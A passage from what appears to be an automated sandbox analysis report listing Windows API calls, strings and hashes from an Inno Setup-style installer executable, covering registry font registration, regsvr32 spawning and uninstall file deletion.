                                                                                • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458278,?, /s ",?,regsvr32.exe",?,00458278), ref: 004581EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseDirectoryHandleSystem
                                                                                • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                • API String ID: 2051275411-1862435767
                                                                                • Opcode ID: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                • Instruction ID: cda81b302c56d3c3b7af3d8ffa4af26d40175ae7a7c1cff7e24eee752c39b11a
                                                                                • Opcode Fuzzy Hash: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                • Instruction Fuzzy Hash: 21411670A047486BDB10EFD6D842B8DBBF9AF45305F50407FB904BB292DF789A098B19
                                                                                APIs
                                                                                • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A9
                                                                                • GetSysColor.USER32(00000014), ref: 0044D1B0
                                                                                • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C8
                                                                                • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1F1
                                                                                • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1FB
                                                                                • GetSysColor.USER32(00000010), ref: 0044D202
                                                                                • SetTextColor.GDI32(00000000,00000000), ref: 0044D21A
                                                                                • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D243
                                                                                • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D26E
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Text$Color$Draw$OffsetRect
                                                                                • String ID:
                                                                                • API String ID: 1005981011-0
                                                                                • Opcode ID: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                • Instruction ID: 8406a00effd73db105afccad7da3796984cf264811f0ddac3e5cace4e0ac1d2b
                                                                                • Opcode Fuzzy Hash: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                • Instruction Fuzzy Hash: A021BDB42015047FC710FB2ACD8AE8B6BDCDF19319B05457AB958EB292C67CDD404668
                                                                                APIs
                                                                                • GetFocus.USER32 ref: 0041B745
                                                                                • GetDC.USER32(?), ref: 0041B751
                                                                                • SelectPalette.GDI32(00000000,?,00000000), ref: 0041B786
                                                                                • RealizePalette.GDI32(00000000), ref: 0041B792
                                                                                • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041B7C0
                                                                                • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041B7F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                • String ID: %H
                                                                                • API String ID: 3275473261-1959103961
                                                                                • Opcode ID: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                • Instruction ID: 38bdddf8d72f5571b31e8017bfcff87152bbfcb95d4f6cd7f9962c0a723fddb9
                                                                                • Opcode Fuzzy Hash: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                • Instruction Fuzzy Hash: 8A512F70A002099FDF11DFA9C881AEEBBF9FF49704F104066F504A7791D7799981CBA9
                                                                                APIs
                                                                                • GetFocus.USER32 ref: 0041BA17
                                                                                • GetDC.USER32(?), ref: 0041BA23
                                                                                • SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA5D
                                                                                • RealizePalette.GDI32(00000000), ref: 0041BA69
                                                                                • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA8D
                                                                                • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAC1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                • String ID: %H
                                                                                • API String ID: 3275473261-1959103961
                                                                                • Opcode ID: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                • Instruction ID: 3fcaffe560058c7771eaec6053d79e0e1924f360d52694d27862de55114c0f48
                                                                                • Opcode Fuzzy Hash: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                • Instruction Fuzzy Hash: 9D512A74A002189FDB11DFA9C891AAEBBF9FF49700F154066F904EB751D738AD40CBA4
                                                                                APIs
                                                                                  • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                  • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 00496585
                                                                                • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496599
                                                                                • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004965B3
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965BF
                                                                                • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965C5
                                                                                • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965D8
                                                                                Strings
                                                                                • Deleting Uninstall data files., xrefs: 004964FB
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                • String ID: Deleting Uninstall data files.
                                                                                • API String ID: 1570157960-2568741658
                                                                                • Opcode ID: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                • Instruction ID: caddedc05ae4add9971b90b84c259ce0cd5246952d50e779d54ebc968ffbf915
                                                                                • Opcode Fuzzy Hash: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                • Instruction Fuzzy Hash: 73216170204250BFEB10EB6ABC82B2637A8DB54728F53453BB501961D6DA7CAC448A6D
                                                                                APIs
                                                                                  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9,?,?,?,?,00000000), ref: 00470263
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9), ref: 0047027A
                                                                                • AddFontResourceA.GDI32(00000000), ref: 00470297
                                                                                • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004702AB
                                                                                Strings
                                                                                • AddFontResource, xrefs: 004702B5
                                                                                • Failed to set value in Fonts registry key., xrefs: 0047026C
                                                                                • Failed to open Fonts registry key., xrefs: 00470281
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                • API String ID: 955540645-649663873
                                                                                • Opcode ID: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                • Instruction ID: 122e39bb1ea2b43e4c2a7da55aa69ddad999e5e54c07bca5f4119535fc7344d3
                                                                                • Opcode Fuzzy Hash: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                • Instruction Fuzzy Hash: 6921E271741204BBDB10EAA68C46FAE67AC9B14704F208477B904EB3C3DA7C9E01866D
                                                                                APIs
                                                                                  • Part of subcall function 00416410: GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                  • Part of subcall function 00416410: UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                  • Part of subcall function 00416410: RegisterClassA.USER32(?), ref: 004164CE
                                                                                • GetVersion.KERNEL32 ref: 00462E60
                                                                                • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462E9E
                                                                                • SHGetFileInfo.SHELL32(00462F3C,00000000,?,00000160,00004011), ref: 00462EBB
                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 00462ED9
                                                                                • SetCursor.USER32(00000000,00000000,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462EDF
                                                                                • SetCursor.USER32(?,00462F1F,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462F12
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                • String ID: Explorer
                                                                                • API String ID: 2594429197-512347832
                                                                                • Opcode ID: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                • Instruction ID: b0f6820fd5a5ea072646c086af9eca81c98a3cd1ffd9b7ca0f87214cf94a4ba1
                                                                                • Opcode Fuzzy Hash: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                • Instruction Fuzzy Hash: CD21E7307403047AEB15BB759D47B9A3798DB09708F4004BFFA05EA1C3EEBD9901966D
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,021A2BDC,?,?,?,021A2BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021A2BDC,?,?,?,021A2BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021A2BDC,?,?,?,021A2BDC), ref: 004783CC
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,021A2BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                • API String ID: 2704155762-2318956294
                                                                                • Opcode ID: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                • Instruction ID: 2a72e966618face2f1bd82d2a524167157479a72732682c44667b4342ad9b4bf
                                                                                • Opcode Fuzzy Hash: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                • Instruction Fuzzy Hash: 370180A07C070536E520316A4C8AFBB654C8B50769F14863FBA1DFA2D3FDED9D06016E
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,00459F8E), ref: 00459ED2
                                                                                  • Part of subcall function 004543F4: FindClose.KERNEL32(000000FF,004544EA), ref: 004544D9
                                                                                Strings
                                                                                • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459F47
                                                                                • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459EAC
                                                                                • Failed to strip read-only attribute., xrefs: 00459EA0
                                                                                • Failed to delete directory (%d)., xrefs: 00459F68
                                                                                • Stripped read-only attribute., xrefs: 00459E94
                                                                                • Failed to delete directory (%d). Will retry later., xrefs: 00459EEB
                                                                                • Deleting directory: %s, xrefs: 00459E5B
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseErrorFindLast
                                                                                • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                • API String ID: 754982922-1448842058
                                                                                • Opcode ID: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                • Instruction ID: b8d9b7298ea7c3337bda5d500217c07e27fbd6b384233f4239b27a523d6d10d0
                                                                                • Opcode Fuzzy Hash: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                • Instruction Fuzzy Hash: 1841A331A04208CACB10EB69C8413AEB6A55F4530AF54897BAC01D73D3CB7C8E0DC75E
                                                                                APIs
                                                                                • GetCapture.USER32 ref: 00422EA4
                                                                                • GetCapture.USER32 ref: 00422EB3
                                                                                • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB9
                                                                                • ReleaseCapture.USER32 ref: 00422EBE
                                                                                • GetActiveWindow.USER32 ref: 00422ECD
                                                                                • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F4C
                                                                                • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FB0
                                                                                • GetActiveWindow.USER32 ref: 00422FBF
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                • String ID:
                                                                                • API String ID: 862346643-0
                                                                                • Opcode ID: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                • Instruction ID: c6261992695b47722d84ffa44129b55dc5b2a4dad2f70b0012283783c1c7b094
                                                                                • Opcode Fuzzy Hash: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                • Instruction Fuzzy Hash: 24417230B00245AFDB10EB69DA86B9E77F1EF44304F5540BAF404AB2A2D778AE40DB49
                                                                                APIs
                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 0042F2BA
                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 0042F2D1
                                                                                • GetActiveWindow.USER32 ref: 0042F2DA
                                                                                • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F307
                                                                                • SetActiveWindow.USER32(?,0042F437,00000000,?), ref: 0042F328
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ActiveLong$Message
                                                                                • String ID:
                                                                                • API String ID: 2785966331-0
                                                                                • Opcode ID: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                • Instruction ID: ac844ef734d24c76dc9aa96f201b13a865b129e9c1b137beabd8cb6517960092
                                                                                • Opcode Fuzzy Hash: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                • Instruction Fuzzy Hash: F931D271A00254AFEB01EFA5DD52E6EBBB8EB09304F9144BAF804E3291D73C9D10CB58
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 0042948A
                                                                                • GetTextMetricsA.GDI32(00000000), ref: 00429493
                                                                                  • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004294A2
                                                                                • GetTextMetricsA.GDI32(00000000,?), ref: 004294AF
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004294B6
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 004294BE
                                                                                • GetSystemMetrics.USER32(00000006), ref: 004294E3
                                                                                • GetSystemMetrics.USER32(00000006), ref: 004294FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
                                                                                • String ID:
                                                                                • API String ID: 1583807278-0
                                                                                • Opcode ID: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                • Instruction ID: 8a5b62ad3b2811282b00f4aa11bc4c2c065e9b9ae855548013837f5c18493421
                                                                                • Opcode Fuzzy Hash: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                • Instruction Fuzzy Hash: 0F01C4A17087103BE321767A9CC6F6F65C8DB44358F84043BF686D63D3D96C9C41866A
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 0041DE27
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DE31
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041DE3E
                                                                                • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE4D
                                                                                • GetStockObject.GDI32(00000007), ref: 0041DE5B
                                                                                • GetStockObject.GDI32(00000005), ref: 0041DE67
                                                                                • GetStockObject.GDI32(0000000D), ref: 0041DE73
                                                                                • LoadIconA.USER32(00000000,00007F00), ref: 0041DE84
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ObjectStock$CapsDeviceIconLoadRelease
                                                                                • String ID:
                                                                                • API String ID: 225703358-0
                                                                                • Opcode ID: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
                                                                                • Instruction ID: 282f56568f1177e4dad385ec7f61a974d29090d827cf1f87eb40c920fa9ca7e8
                                                                                • Opcode Fuzzy Hash: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
                                                                                • Instruction Fuzzy Hash: 4C1142706457015EE340BFA66E52B6A36A4D725708F40413FF609AF3D1D77A2C448B9E
                                                                                APIs
                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 00463344
                                                                                • SetCursor.USER32(00000000,00000000,00007F02,00000000,004633D9), ref: 0046334A
                                                                                • SetCursor.USER32(?,004633C1,00007F02,00000000,004633D9), ref: 004633B4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$Load
                                                                                • String ID: $ $Internal error: Item already expanding
                                                                                • API String ID: 1675784387-1948079669
                                                                                • Opcode ID: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                • Instruction ID: e4e85f4aa3fa623d7d3a169fbc538aa22306e9421cedfdc69a3031d12d347dae
                                                                                • Opcode Fuzzy Hash: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                • Instruction Fuzzy Hash: 4CB18270604284EFDB11DF29C545B9ABBF1BF04305F1484AAE8469B792DB78EE44CB4A
                                                                                APIs
